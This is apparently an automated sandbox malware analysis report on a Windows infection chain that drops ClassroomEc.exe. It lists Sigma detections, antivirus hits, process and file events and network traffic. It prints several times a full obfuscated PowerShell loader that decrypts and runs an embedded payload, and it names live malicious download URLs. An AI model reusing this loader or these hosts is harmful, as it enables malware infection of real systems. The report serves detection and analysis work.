Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: 30253\Identification.pif 30253\m , CommandLine: 30253\Identification.pif 30253\m , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7812, ParentProcessName: cmd.exe, ProcessCommandLine: 30253\Identification.pif 30253\m , ProcessId: 8140, ProcessName: Identification.pif

Sigma detected: Gzip Archive Decode Via PowerShell

Source: Process started

Author: Hieu Tran: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4408, TargetFilename: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOd

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: https://2no.co/2ZrVm4hn	Avira URL Cloud: Label: malware
Source: https://2no.co/2ZrVm4;Set-ItemProperty	Avira URL Cloud: Label: malware
Source: https://2no.co/2ZrVm4	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://whitemansearch.shop/ClassroomEc.exe

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Virustotal: Detection: 49%			Perma Link

Source: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	HTTP Parser: No favicon
Source: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	HTTP Parser: No favicon
Source: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu	HTTP Parser: No favicon
Source: https://www.google.com/recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b	HTTP Parser: No favicon

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49732 version: TLS 1.2

Source:	Binary string: calc.pdbGCTL source: mshta.exe, 00000000.00000003.1993161798.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003730258.000000000966E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993040179.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1992163204.0000000002BA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003680117.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2004768775.000000000966F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993408260.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003973332.0000000002BE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003585857.0000000002BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1991920596.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: Identification.pif, 00000013.00000003.2953589381.0000000001990000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Identification.pif, 00000013.00000003.2953335217.0000000008A90000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2953190049.00000000088F0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: mshta.exe, 00000000.00000003.1993161798.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003730258.000000000966E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993040179.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1992163204.0000000002BA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2004768775.000000000966F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993408260.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1991920596.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Identification.pif, 00000013.00000003.2953335217.0000000008A90000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2953190049.00000000088F0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: Identification.pif, 00000013.00000003.2953589381.0000000001990000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A75080 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	8_2_00A75080
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A73C80 FindFirstFileW,FindClose,SetLastError,CompareFileTime,	8_2_00A73C80
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A74ED0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,	8_2_00A74ED0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx-reuseport/1.21.1Date: Wed, 21 Feb 2024 07:14:07 GMTContent-Type: application/octet-streamContent-Length: 1212711Last-Modified: Tue, 20 Feb 2024 15:43:47 GMTConnection: keep-aliveKeep-Alive: timeout=30ETag: "65d4c8b3-128127"Expires: Fri, 22 Mar 2024 07:14:07 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 1f 00 94 82 5b 61 fa d1 5b 61 fa d1 5b 61 fa d1 52 19 7e d1 59 61 fa d1 52 19 6f d1 5c 61 fa d1 52 19 79 d1 4d 61 fa d1 52 19 69 d1 4a 61 fa d1 5b 61 fb d1 98 61 fa d1 34 17 64 d1 59 61 fa d1 34 17 50 d1 5f 61 fa d1 34 17 51 d1 6a 61 fa d1 34 17 60 d1 5a 61 fa d1 34 17 67 d1 5a 61 fa d1 52 69 63 68 5b 61 fa d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 be 2e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 7a 02 00 00 ba 00 00 00 00 00 00 f8 7b 02 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 03 00 00 04 00 00 f5 8d 12 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 b5 02 00 b4 00 00 00 00 00 03 00 51 40 00 00 00 00 00 00 00 00 00 00 3f 59 12 00 e8 27 00 00 00 50 03 00 38 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f 78 02 00 00 10 00 00 00 7a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 35 00 00 00 90 02 00 00 36 00 00 00 7e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 2b 00 00 00 d0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 51 40 00 00 00 00 03 00 00 42 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 15 00 00 00 50 03 00 00 16 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /ClassroomEc.exe HTTP/1.1Host: whitemansearch.shopConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.79.229 104.21.79.229
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
Source: unknown	TCP traffic detected without corresponding DNS query: 23.51.58.94
